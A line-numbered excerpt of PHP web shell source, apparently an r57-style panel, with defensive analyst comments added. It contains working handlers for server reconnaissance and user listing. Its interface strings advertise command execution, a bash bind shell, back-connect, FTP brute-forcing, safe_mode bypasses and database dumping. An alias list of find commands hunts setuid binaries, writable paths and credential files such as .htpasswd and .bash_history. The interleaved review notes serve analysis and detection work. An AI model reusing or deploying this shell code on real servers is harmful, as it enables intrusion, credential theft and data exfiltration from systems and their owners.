659 @unlink("/tmp/bdpl");
660 @unlink("/tmp/back");
661 @unlink("/tmp/bd");
662 @unlink("/tmp/bd.c");
663 @unlink("/tmp/dp");
664 @unlink("/tmp/dpc");
665 @unlink("/tmp/dpc.c");
666 }
// Request handler: GET ?phpini prints every PHP configuration directive with its local
// and master value as an HTML table, then stops. ws() is a helper that is not defined in
// this part of the file.
// Review note (defensive): this is configuration reconnaissance. It exposes settings
// such as disable_functions, open_basedir and the upload and session paths to the client.
667 if(isset($_GET['phpini']))
668 {
669 echo $head;
// Format one directive value for display: empty string -> "no value", booleans ->
// TRUE/FALSE, null -> NULL, arrays and objects -> print_r() text; the result is then
// passed through U_wordwrap().
670 function U_value($value)
671 {
672 if ($value == '') return '<i>no value</i>';
673 if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
674 if ($value === null) return 'NULL';
675 if (@is_object($value)) $value = (array) $value;
676 if (@is_array($value))
677 {
// Capture print_r() output through an output buffer.
678 @ob_start();
679 print_r($value);
680 $value = @ob_get_contents();
681 @ob_end_clean();
682 }
683 return U_wordwrap((string) $value);
684 }
// HTML-escape the text and insert a <wbr /> break opportunity every 100 characters;
// the regular expression moves a break that landed inside an HTML entity to just after it.
685 function U_wordwrap($str)
686 {
687 $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
688 return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
689 }
690 if (@function_exists('ini_get_all'))
691 {
692 $r = '';
693 echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
// One table row per directive: name, local value, global (master) value.
694 foreach (@ini_get_all() as $key=>$value)
695 {
696 $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
697 }
698 echo $r;
699 echo '</table>';
700 }
701 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
702 die();
703 }
// Request handlers: GET ?cpu and GET ?mem. Each reads a file line by line, splits every
// line at ':' into a name and a value, and prints the pairs as an HTML table; when the
// file cannot be read a single '---' row is printed. Both stop the script afterwards.
// The files are opened by the relative names "cpuinfo" and "meminfo", so they resolve
// against the process's current directory. The values are written into the page without
// HTML escaping, and $r is appended to without being initialised in these branches.
// ws() is a helper that is not defined in this part of the file.
// Review note (defensive): together with the phpinfo and phpini handlers this is host
// reconnaissance, and requests carrying these bare query parameters to an unexpected
// script are worth flagging in access logs.
704 if(isset($_GET['cpu']))
705 {
706 echo $head;
707 echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
708 $cpuf = @file("cpuinfo");
709 if($cpuf)
710 {
711 $c = @sizeof($cpuf);
712 for($i=0;$i<$c;$i++)
713 {
714 $info = @explode(":",$cpuf[$i]);
// Lines without a value after the colon get a placeholder.
715 if($info[1]==""){ $info[1]="---"; }
716 $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
717 }
718 echo $r;
719 }
720 else
721 {
722 echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
723 }
724 echo '</table>';
725 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
726 die();
727 }
// Same logic as the ?cpu handler above, applied to the file "meminfo".
728 if(isset($_GET['mem']))
729 {
730 echo $head;
731 echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
732 $memf = @file("meminfo");
733 if($memf)
734 {
735 $c = sizeof($memf);
736 for($i=0;$i<$c;$i++)
737 {
738 $info = explode(":",$memf[$i]);
739 if($info[1]==""){ $info[1]="---"; }
740 $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
741 }
742 echo $r;
743 }
744 else
745 {
746 echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
747 }
748 echo '</table>';
749 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
750 die();
751 }
752 $lang=array(
753 'ru_text1' =>'÷ÙÐÏÌÎÅÎÎÁÑ ËÏÍÁÎÄÁ',
754 'ru_text2' =>'÷ÙÐÏÌÎÅÎÉÅ ËÏÍÁÎÄ ÎÁ ÓÅÒ×ÅÒÅ',
755 'ru_text3' =>'÷ÙÐÏÌÎÉÔØ ËÏÍÁÎÄÕ',
756 'ru_text4' =>'òÁÂÏÞÁÑ ÄÉÒÅËÔÏÒÉÑ',
757 'ru_text5' =>'úÁÇÒÕÚËÁ ÆÁÊÌÏ× ÎÁ ÓÅÒ×ÅÒ',
758 'ru_text6' =>'ìÏËÁÌØÎÙÊ ÆÁÊÌ',
759 'ru_text7' =>'áÌÉÁÓÙ',
760 'ru_text8' =>'÷ÙÂÅÒÉÔÅ ÁÌÉÁÓ',
761 'ru_butt1' =>'÷ÙÐÏÌÎÉÔØ',
762 'ru_butt2' =>'úÁÇÒÕÚÉÔØ',
763 'ru_text9' =>'ïÔËÒÙÔÉÅ ÐÏÒÔÁ É ÐÒÉ×ÑÚËÁ ÅÇÏ Ë /bin/bash',
764 'ru_text10'=>'ïÔËÒÙÔØ ÐÏÒÔ',
765 'ru_text11'=>'ðÁÒÏÌØ ÄÌÑ ÄÏÓÔÕÐÁ',
766 'ru_butt3' =>'ïÔËÒÙÔØ',
767 'ru_text12'=>'back-connect',
768 'ru_text13'=>'IP-ÁÄÒÅÓ',
769 'ru_text14'=>'ðÏÒÔ',
770 'ru_butt4' =>'÷ÙÐÏÌÎÉÔØ',
771 'ru_text15'=>'úÁÇÒÕÚËÁ ÆÁÊÌÏ× Ó ÕÄÁÌÅÎÎÏÇÏ ÓÅÒ×ÅÒÁ',
772 'ru_text16'=>'éÓÐÏÌØÚÏ×ÁÔØ',
773 'ru_text17'=>'õÄÁÌÅÎÎÙÊ ÆÁÊÌ',
774 'ru_text18'=>'ìÏËÁÌØÎÙÊ ÆÁÊÌ',
775 'ru_text19'=>'Exploits',
776 'ru_text20'=>'éÓÐÏÌØÚÏ×ÁÔØ',
777 'ru_text21'=>'îÏ×ÏÅ ÉÍÑ',
778 'ru_text22'=>'datapipe',
779 'ru_text23'=>'ìÏËÁÌØÎÙÊ ÐÏÒÔ',
780 'ru_text24'=>'õÄÁÌÅÎÎÙÊ ÈÏÓÔ',
781 'ru_text25'=>'õÄÁÌÅÎÎÙÊ ÐÏÒÔ',
782 'ru_text26'=>'éÓÐÏÌØÚÏ×ÁÔØ',
783 'ru_butt5' =>'úÁÐÕÓÔÉÔØ',
784 'ru_text28'=>'òÁÂÏÔÁ × safe_mode',
785 'ru_text29'=>'äÏÓÔÕÐ ÚÁÐÒÅÝÅÎ',
786 'ru_butt6' =>'óÍÅÎÉÔØ',
787 'ru_text30'=>'ðÒÏÓÍÏÔÒ ÆÁÊÌÁ',
788 'ru_butt7' =>'÷Ù×ÅÓÔÉ',
789 'ru_text31'=>'æÁÊÌ ÎÅ ÎÁÊÄÅÎ',
790 'ru_text32'=>'÷ÙÐÏÌÎÅÎÉÅ PHP ËÏÄÁ',
791 'ru_text33'=>'ðÒÏ×ÅÒËÁ ×ÏÚÍÏÖÎÏÓÔÉ ÏÂÈÏÄÁ ÏÇÒÁÎÉÞÅÎÉÊ open_basedir ÞÅÒÅÚ ÆÕÎËÃÉÉ cURL',
792 'ru_butt8' =>'ðÒÏ×ÅÒÉÔØ',
793 'ru_text34'=>'ðÒÏ×ÅÒËÁ ×ÏÚÍÏÖÎÏÓÔÉ ÏÂÈÏÄÁ ÏÇÒÁÎÉÞÅÎÉÊ safe_mode ÞÅÒÅÚ ÆÕÎËÃÉÀ include',
794 'ru_text35'=>'ðÒÏ×ÅÒËÁ ×ÏÚÍÏÖÎÏÓÔÉ ÏÂÈÏÄÁ ÏÇÒÁÎÉÞÅÎÉÊ safe_mode ÞÅÒÅÚ ÚÁÇÒÕÚËÕ ÆÁÊÌÁ × mysql',
795 'ru_text36'=>'âÁÚÁ . ôÁÂÌÉÃÁ',
796 'ru_text37'=>'ìÏÇÉÎ',
797 'ru_text38'=>'ðÁÒÏÌØ',
798 'ru_text39'=>'âÁÚÁ',
799 'ru_text40'=>'äÁÍÐ ÔÁÂÌÉÃÙ ÂÁÚÙ ÄÁÎÎÙÈ',
800 'ru_butt9' =>'äÁÍÐ',
801 'ru_text41'=>'óÏÈÒÁÎÉÔØ × ÆÁÊÌÅ',
802 'ru_text42'=>'òÅÄÁËÔÉÒÏ×ÁÎÉÅ ÆÁÊÌÁ',
803 'ru_text43'=>'òÅÄÁËÔÉÒÏ×ÁÔØ ÆÁÊÌ',
804 'ru_butt10'=>'óÏÈÒÁÎÉÔØ',
805 'ru_butt11'=>'òÅÄÁËÔÉÒÏ×ÁÔØ',
806 'ru_text44'=>'òÅÄÁËÔÉÒÏ×ÁÎÉÅ ÆÁÊÌÁ ÎÅ×ÏÚÍÏÖÎÏ! äÏÓÔÕÐ ÔÏÌØËÏ ÄÌÑ ÞÔÅÎÉÑ!',
807 'ru_text45'=>'æÁÊÌ ÓÏÈÒÁÎÅÎ',
808 'ru_text46'=>'ðÒÏÓÍÏÔÒ phpinfo()',
809 'ru_text47'=>'ðÒÏÓÍÏÔÒ ÎÁÓÔÒÏÅË php.ini',
810 'ru_text48'=>'õÄÁÌÅÎÉÅ ×ÒÅÍÅÎÎÙÈ ÆÁÊÌÏ×',
811 'ru_text49'=>'õÄÁÌÅÎÉÅ ÓËÒÉÐÔÁ Ó ÓÅÒ×ÅÒÁ',
812 'ru_text50'=>'éÎÆÏÒÍÁÃÉÑ Ï ÐÒÏÃÅÓÓÏÒÅ',
813 'ru_text51'=>'éÎÆÏÒÍÁÃÉÑ Ï ÐÁÍÑÔÉ',
814 'ru_text52'=>'ôÅËÓÔ ÄÌÑ ÐÏÉÓËÁ',
815 'ru_text53'=>'éÓËÁÔØ × ÐÁÐËÅ',
816 'ru_text54'=>'ðÏÉÓË ÔÅËÓÔÁ × ÆÁÊÌÁÈ',
817 'ru_butt12'=>'îÁÊÔÉ',
818 'ru_text55'=>'ôÏÌØËÏ × ÆÁÊÌÁÈ',
819 'ru_text56'=>'îÉÞÅÇÏ ÎÅ ÎÁÊÄÅÎÏ',
820 'ru_text57'=>'óÏÚÄÁÔØ/õÄÁÌÉÔØ æÁÊÌ/äÉÒÅËÔÏÒÉÀ',
821 'ru_text58'=>'éÍÑ',
822 'ru_text59'=>'æÁÊÌ',
823 'ru_text60'=>'äÉÒÅËÔÏÒÉÀ',
824 'ru_butt13'=>'óÏÚÄÁÔØ/õÄÁÌÉÔØ',
825 'ru_text61'=>'æÁÊÌ ÓÏÚÄÁÎ',
826 'ru_text62'=>'äÉÒÅËÔÏÒÉÑ ÓÏÚÄÁÎÁ',
827 'ru_text63'=>'æÁÊÌ ÕÄÁÌÅÎ',
828 'ru_text64'=>'äÉÒÅËÔÏÒÉÑ ÕÄÁÌÅÎÁ',
829 'ru_text65'=>'óÏÚÄÁÔØ',
830 'ru_text66'=>'õÄÁÌÉÔØ',
831 'ru_text67'=>'Chown/Chgrp/Chmod',
832 'ru_text68'=>'ëÏÍÁÎÄÁ',
833 'ru_text69'=>'ðÁÒÁÍÅÔÒ1',
834 'ru_text70'=>'ðÁÒÁÍÅÔÒ2',
835 'ru_text71'=>"÷ÔÏÒÏÊ ÐÁÒÁÍÅÔÒ ËÏÍÁÎÄÙ:\r\n- ÄÌÑ CHOWN - ÉÍÑ ÎÏ×ÏÇÏ ÐÏÌØÚÏ×ÁÔÅÌÑ ÉÌÉ ÅÇÏ UID (ÞÉÓÌÏÍ) \r\n- ÄÌÑ ËÏÍÁÎÄÙ CHGRP - ÉÍÑ ÇÒÕÐÐÙ ÉÌÉ GID (ÞÉÓÌÏÍ) \r\n- ÄÌÑ ËÏÍÁÎÄÙ CHMOD - ÃÅÌÏÅ ÞÉÓÌÏ × ×ÏÓØÍÅÒÉÞÎÏÍ ÐÒÅÄÓÔÁ×ÌÅÎÉÉ (ÎÁÐÒÉÍÅÒ 0777)",
836 'ru_text72'=>'ôÅËÓÔ ÄÌÑ ÐÏÉÓËÁ',
837 'ru_text73'=>'éÓËÁÔØ × ÐÁÐËÅ',
838 'ru_text74'=>'éÓËÁÔØ × ÆÁÊÌÁÈ',
839 'ru_text75'=>'* ÍÏÖÎÏ ÉÓÐÏÌØÚÏ×ÁÔØ ÒÅÇÕÌÑÒÎÏÅ ×ÙÒÁÖÅÎÉÅ',
840 'ru_text76'=>'ðÏÉÓË ÔÅËÓÔÁ × ÆÁÊÌÁÈ Ó ÐÏÍÏÝØÀ ÕÔÉÌÉÔÙ find',
841 'ru_text80'=>'ôÉÐ',
842 'ru_text81'=>'óÅÔØ',
843 'ru_text82'=>'âÁÚÙ ÄÁÎÎÙÈ',
844 'ru_text83'=>'÷ÙÐÏÌÎÅÎÉÅ SQL ÚÁÐÒÏÓÁ',
845 'ru_text84'=>'SQL ÚÁÐÒÏÓ',
846 'ru_text85'=>'ðÒÏ×ÅÒËÁ ×ÏÚÍÏÖÎÏÓÔÉ ÏÂÈÏÄÁ ÏÇÒÁÎÉÞÅÎÉÊ safe_mode ÞÅÒÅÚ ×ÙÐÏÌÎÅÎÉÅ ËÏÍÁÎÄ × MSSQL ÓÅÒ×ÅÒÅ',
847 'ru_text86'=>'óËÁÞÉ×ÁÎÉÅ ÆÁÊÌÁ Ó ÓÅÒ×ÅÒÁ',
848 'ru_butt14'=>'óËÁÞÁÔØ',
849 'ru_text87'=>'óËÁÞÉ×ÁÎÉÅ ÆÁÊÌÏ× Ó ÕÄÁÌÅÎÎÏÇÏ ftp-ÓÅÒ×ÅÒÁ',
850 'ru_text88'=>'FTP-ÓÅÒ×ÅÒ:ÐÏÒÔ',
851 'ru_text89'=>'æÁÊÌ ÎÁ ftp ÓÅÒ×ÅÒÅ',
852 'ru_text90'=>'òÅÖÉÍ ÐÅÒÅÄÁÞÉ',
853 'ru_text91'=>'áÒÈÉ×ÉÒÏ×ÁÔØ ×',
854 'ru_text92'=>'ÂÅÚ ÁÒÈÉ×ÁÃÉÉ',
855 'ru_text93'=>'FTP',
856 'ru_text94'=>'FTP-ÂÒÕÔÆÏÒÓ',
857 'ru_text95'=>'óÐÉÓÏË ÐÏÌØÚÏ×ÁÔÅÌÅÊ',
858 'ru_text96'=>'îÅ ÕÄÁÌÏÓØ ÐÏÌÕÞÉÔØ ÓÐÉÓÏË ÐÏÌØÚÏ×ÁÔÅÌÅÊ',
859 'ru_text97'=>'ðÒÏ×ÅÒÅÎÏ ËÏÍÂÉÎÁÃÉÊ: ',
860 'ru_text98'=>'õÄÁÞÎÙÈ ÐÏÄËÌÀÞÅÎÉÊ: ',
861 'ru_text99'=>'* × ËÁÞÅÓÔ×Å ÌÏÇÉÎÁ É ÐÁÒÏÌÑ ÉÓÐÏÌØÚÕÅÔÓÑ ÉÍÑ ÐÏÌØÚÏ×ÁÔÅÌÑ ÉÚ /etc/passwd',
862 'ru_text100'=>'ïÔÐÒÁ×ËÁ ÆÁÊÌÏ× ÎÁ ÕÄÁÌÅÎÎÙÊ ÆÔÐ ÓÅÒ×ÅÒ',
863 'ru_text101'=>'éÓÐÏÌØÚÏ×ÁÔØ ÔÁËÖÅ ÐÅÒÅ×ÅÒÎÕÔÏÅ (user -> resu) ÉÍÑ ÐÏÌØÚÏ×ÁÔÅÌÑ × ËÁÞÅÓÔ×Å ÐÁÒÏÌÑ',
864 'ru_text102'=>'ðÏÞÔÁ',
865 'ru_text103'=>'ïÔÐÒÁ×ËÁ ÐÉÓØÍÁ',
866 'ru_text104'=>'ïÔÐÒÁ×ËÁ ÆÁÊÌÁ ÎÁ ÐÏÞÔÏ×ÙÊ ÑÝÉË',
867 'ru_text105'=>'ëÏÍÕ',
868 'ru_text106'=>'ïÔ',
869 'ru_text107'=>'ôÅÍÁ',
870 'ru_butt15'=>'ïÔÐÒÁ×ÉÔØ',
871 'ru_text108'=>'ôÅËÓÔ ÐÉÓØÍÁ',
872 'ru_text109'=>'ó×ÅÒÎÕÔØ',
873 'ru_text110'=>'òÁÚ×ÅÒÎÕÔØ',
874 'ru_text111'=>'SQL-óÅÒ×ÅÒ : ÐÏÒÔ',
875 'ru_text112'=>'ðÒÏ×ÅÒËÁ ×ÏÚÍÏÖÎÏÓÔÉ ÏÂÈÏÄÁ ÏÇÒÁÎÉÞÅÎÉÊ safe_mode ÞÅÒÅÚ ÉÓÐÏÌØÚÏ×ÁÎÉÅ ÆÕÎËÃÉÉ mb_send_mail',
876 'ru_text113'=>'ðÒÏ×ÅÒËÁ ×ÏÚÍÏÖÎÏÓÔÉ ÏÂÈÏÄÁ ÏÇÒÁÎÉÞÅÎÉÊ safe_mode, ÐÒÏÓÍÏÔÒ ÌÉÓÔÉÎÇÁ ÄÉÒÅËÔÏÒÉÊ Ó ÉÓÐÏÌØÚÏ×ÁÎÉÅÍ imap_list',
877 'ru_text114'=>'ðÒÏ×ÅÒËÁ ×ÏÚÍÏÖÎÏÓÔÉ ÏÂÈÏÄÁ ÏÇÒÁÎÉÞÅÎÉÊ safe_mode, ÐÒÏÓÍÏÔÒ ÓÏÄÅÒÖÉÍÏÇÏ ÆÁÊÌÁ Ó ÉÓÐÏÌØÚÏ×ÁÎÉÅÍ imap_body',
878 'ru_text115'=>'ðÒÏ×ÅÒËÁ ×ÏÚÍÏÖÎÏÓÔÉ ÏÂÈÏÄÁ ÏÇÒÁÎÉÞÅÎÉÊ safe_mode, ËÏÐÉÒÏ×ÁÎÉÅ ÆÁÊÌÏ× Ó compress.zlib:// × copy()',
879 'ru_text116'=>'ëÏÐÉÒÏ×ÁÔØ ÆÁÊÌ',
880 'ru_text117'=>'×',
881 'ru_text118'=>'æÁÊÌ ÓËÏÐÉÒÏ×ÁÎ',
882 'ru_text119'=>'îÅ ÕÄÁÌÏÓØ ÓËÏÐÉÒÏ×ÁÔØ ÆÁÊÌ',
883 'ru_err0'=>'ïÛÉÂËÁ! îÅ ÍÏÇÕ ÚÁÐÉÓÁÔØ × ÆÁÊÌ ',
884 'ru_err1'=>'ïÛÉÂËÁ! îÅ ÍÏÇÕ ÐÒÏÞÉÔÁÔØ ÆÁÊÌ ',
885 'ru_err2'=>'ïÛÉÂËÁ! îÅ ÕÄÁÌÏÓØ ÓÏÚÄÁÔØ ',
886 'ru_err3'=>'ïÛÉÂËÁ! îÅ ÕÄÁÌÏÓØ ÐÏÄËÌÀÞÉÔØÓÑ Ë ftp ÓÅÒ×ÅÒÕ',
887 'ru_err4'=>'ïÛÉÂËÁ Á×ÔÏÒÉÚÁÃÉÉ ÎÁ ftp ÓÅÒ×ÅÒÅ',
888 'ru_err5'=>'ïÛÉÂËÁ! îÅ ÕÄÁÌÏÓØ ÐÏÍÅÎÑÔØ ÄÉÒÅËÔÏÒÉÀ ÎÁ ftp ÓÅÒ×ÅÒÅ',
889 'ru_err6'=>'ïÛÉÂËÁ! îÅ ÕÄÁÌÏÓØ ÏÔÐÒÁ×ÉÔØ ÐÉÓØÍÏ',
890 'ru_err7'=>'ðÉÓØÍÏ ÏÔÐÒÁ×ÌÅÎÏ',
891 /* --------------------------------------------------------------- */
892 'eng_text1' =>'Executed command',
893 'eng_text2' =>'Execute command on server',
894 'eng_text3' =>'Run command',
895 'eng_text4' =>'Work directory',
896 'eng_text5' =>'Upload files on server',
897 'eng_text6' =>'Local file',
898 'eng_text7' =>'Aliases',
899 'eng_text8' =>'Select alias',
900 'eng_butt1' =>'Execute',
901 'eng_butt2' =>'Upload',
902 'eng_text9' =>'Bind port to /bin/bash',
903 'eng_text10'=>'Port',
904 'eng_text11'=>'Password for access',
905 'eng_butt3' =>'Bind',
906 'eng_text12'=>'back-connect',
907 'eng_text13'=>'IP',
908 'eng_text14'=>'Port',
909 'eng_butt4' =>'Connect',
910 'eng_text15'=>'Upload files from remote server',
911 'eng_text16'=>'With',
912 'eng_text17'=>'Remote file',
913 'eng_text18'=>'Local file',
914 'eng_text19'=>'Exploits',
915 'eng_text20'=>'Use',
916 'eng_text21'=>' New name',
917 'eng_text22'=>'datapipe',
918 'eng_text23'=>'Local port',
919 'eng_text24'=>'Remote host',
920 'eng_text25'=>'Remote port',
921 'eng_text26'=>'Use',
922 'eng_butt5' =>'Run',
923 'eng_text28'=>'Work in safe_mode',
924 'eng_text29'=>'ACCESS DENIED',
925 'eng_butt6' =>'Change',
926 'eng_text30'=>'Cat file',
927 'eng_butt7' =>'Show',
928 'eng_text31'=>'File not found',
929 'eng_text32'=>'Eval PHP code',
930 'eng_text33'=>'Test bypass open_basedir with cURL functions',
931 'eng_butt8' =>'Test',
932 'eng_text34'=>'Test bypass safe_mode with include function',
933 'eng_text35'=>'Test bypass safe_mode with load file in mysql',
934 'eng_text36'=>'Database . Table',
935 'eng_text37'=>'Login',
936 'eng_text38'=>'Password',
937 'eng_text39'=>'Database',
938 'eng_text40'=>'Dump database table',
939 'eng_butt9' =>'Dump',
940 'eng_text41'=>'Save dump in file',
941 'eng_text42'=>'Edit files',
942 'eng_text43'=>'File for edit',
943 'eng_butt10'=>'Save',
944 'eng_text44'=>'Can\'t edit file! Only read access!',
945 'eng_text45'=>'File saved',
946 'eng_text46'=>'Show phpinfo()',
947 'eng_text47'=>'Show variables from php.ini',
948 'eng_text48'=>'Delete temp files',
949 'eng_butt11'=>'Edit file',
950 'eng_text49'=>'Delete script from server',
951 'eng_text50'=>'View cpu info',
952 'eng_text51'=>'View memory info',
953 'eng_text52'=>'Find text',
954 'eng_text53'=>'In dirs',
955 'eng_text54'=>'Find text in files',
956 'eng_butt12'=>'Find',
957 'eng_text55'=>'Only in files',
958 'eng_text56'=>'Nothing :(',
959 'eng_text57'=>'Create/Delete File/Dir',
960 'eng_text58'=>'name',
961 'eng_text59'=>'file',
962 'eng_text60'=>'dir',
963 'eng_butt13'=>'Create/Delete',
964 'eng_text61'=>'File created',
965 'eng_text62'=>'Dir created',
966 'eng_text63'=>'File deleted',
967 'eng_text64'=>'Dir deleted',
968 'eng_text65'=>'Create',
969 'eng_text66'=>'Delete',
970 'eng_text67'=>'Chown/Chgrp/Chmod',
971 'eng_text68'=>'Command',
972 'eng_text69'=>'param1',
973 'eng_text70'=>'param2',
974 'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
975 'eng_text72'=>'Text for find',
976 'eng_text73'=>'Find in folder',
977 'eng_text74'=>'Find in files',
978 'eng_text75'=>'* you can use regexp',
979 'eng_text76'=>'Search text in files via find',
980 'eng_text80'=>'Type',
981 'eng_text81'=>'Net',
982 'eng_text82'=>'Databases',
983 'eng_text83'=>'Run SQL query',
984 'eng_text84'=>'SQL query',
985 'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
986 'eng_text86'=>'Download files from server',
987 'eng_butt14'=>'Download',
988 'eng_text87'=>'Download files from remote ftp-server',
989 'eng_text88'=>'FTP-server:port',
990 'eng_text89'=>'File on ftp',
991 'eng_text90'=>'Transfer mode',
992 'eng_text91'=>'Archivation',
993 'eng_text92'=>'without archivation',
994 'eng_text93'=>'FTP',
995 'eng_text94'=>'FTP-bruteforce',
996 'eng_text95'=>'Users list',
997 'eng_text96'=>'Can\'t get users list',
998 'eng_text97'=>'checked: ',
999 'eng_text98'=>'success: ',
1000 'eng_text99'=>'* use username from /etc/passwd for ftp login and password',
1001 'eng_text100'=>'Send file to remote ftp server',
1002 'eng_text101'=>'Use reverse (user -> resu) login for password',
1003 'eng_text102'=>'Mail',
1004 'eng_text103'=>'Send email',
1005 'eng_text104'=>'Send file to email',
1006 'eng_text105'=>'To',
1007 'eng_text106'=>'From',
1008 'eng_text107'=>'Subj',
1009 'eng_butt15'=>'Send',
1010 'eng_text108'=>'Mail',
1011 'eng_text109'=>'Hide',
1012 'eng_text110'=>'Show',
1013 'eng_text111'=>'SQL-Server : Port',
1014 'eng_text112'=>'Test bypass safe_mode with function mb_send_mail',
1015 'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list',
1016 'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body',
1017 'eng_text115'=>'Test bypass safe_mode, copy file via compress.zlib:// in function copy()',
1018 'eng_text116'=>'Copy from',
1019 'eng_text117'=>'to',
1020 'eng_text118'=>'File copied',
1021 'eng_text119'=>'Cant copy file',
1022 'eng_err0'=>'Error! Can\'t write in file ',
1023 'eng_err1'=>'Error! Can\'t read file ',
1024 'eng_err2'=>'Error! Can\'t create ',
1025 'eng_err3'=>'Error! Can\'t connect to ftp',
1026 'eng_err4'=>'Error! Can\'t login on ftp server',
1027 'eng_err5'=>'Error! Can\'t change dir on ftp',
1028 'eng_err6'=>'Error! Can\'t sent mail',
1029 'eng_err7'=>'Mail send',
1030 );
/*
Command aliases
They save retyping the same commands over and over. ( Made thanks to my natural laziness )
You can add or change the commands yourself.

Analyst note: each key is a menu label and each value is a shell command string.
Presumably the selected value is handed to ex() - the dispatch code is outside this
excerpt. The set is host reconnaissance: setuid (-perm -04000) and setgid (-perm -02000)
binaries, world-writable files and directories (-perm -2), config files, and
credential/history files (service.pwd, .htpasswd, .bash_history, .mysql_history,
.fetchmailrc), plus listening sockets. A web-server account spawning `find /` with
these arguments is a practical process-audit signal.
*/
$aliases=array(
    'find suid files'=>'find / -type f -perm -04000 -ls',
    'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
    'find sgid files'=>'find / -type f -perm -02000 -ls',
    'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
    'find config.inc.php files'=>'find / -type f -name config.inc.php',
    'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
    'find config* files'=>'find / -type f -name "config*"',
    'find config* files in current dir'=>'find . -type f -name "config*"',
    'find all writable files'=>'find / -type f -perm -2 -ls',
    'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
    'find all writable directories'=>'find / -type d -perm -2 -ls',
    'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
    'find all writable directories and files'=>'find / -perm -2 -ls',
    'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
    'find all service.pwd files'=>'find / -type f -name service.pwd',
    'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
    'find all .htpasswd files'=>'find / -type f -name .htpasswd',
    'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
    'find all .bash_history files'=>'find / -type f -name .bash_history',
    'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
    'find all .mysql_history files'=>'find / -type f -name .mysql_history',
    'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
    'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
    'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
    'list file attributes on a Linux second extended file system'=>'lsattr -va',
    'show opened ports'=>'netstat -an | grep -i listen',
    // The dashed key reads as a visual separator entry; its command is a plain listing.
    '----------------------------------------------------------------------------------------------------'=>'ls -la'
);
// Reusable HTML fragments for the panel layout: section header rows ($table_up*),
// row terminator, bracket/arrow decorations, default font, table and POST form tags.
// The fixed markup (Verdana size=-2, bgcolor=#cccccc, "<form name=form method=POST>")
// recurs in every rendered page and can serve as a response-body signature.
$table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
$table_up2 = " ::</div></b></font></td></tr><tr><td>";
$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
$table_end1 = "</td></tr>";
$arrow = " <font face=Webdings color=gray>4</font>";
$lb = "<font color=black>[</font>";
$rb = "<font color=black>]</font>";
$font = "<font face=Verdana size=-2>";
$ts = "<table class=table1 width=100% align=center>";
$te = "</table>";
$fs = "<form name=form method=POST>";
$fe = "</form>";
1077
// ?users request: print the local account names and stop.
// get_users() (defined later in this file) reads /etc/passwd; a falsy result prints
// the localized "can't get users list" text ($lang[..._text96]).
// Triage: a GET whose query string is the bare key `users` selects this branch.
if(isset($_GET['users']))
{
    if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
    else
    {
        echo '<center>';
        // One account name per line, echoed without HTML escaping.
        foreach($users as $user) { echo $user."<br>"; }
        echo '</center>';
    }
    // PHP_SELF is placed in the href unescaped; die() ends the request here.
    echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
}
1089
// Working directory: a POSTed 'dir' value goes straight to chdir(), errors suppressed.
if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
$dir = @getcwd();
$unix = 0;
// A drive-letter path (second character ':') is taken as Windows, anything else as Unix.
if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
// getcwd() gave nothing: fall back to the OS environment variable, then php_uname().
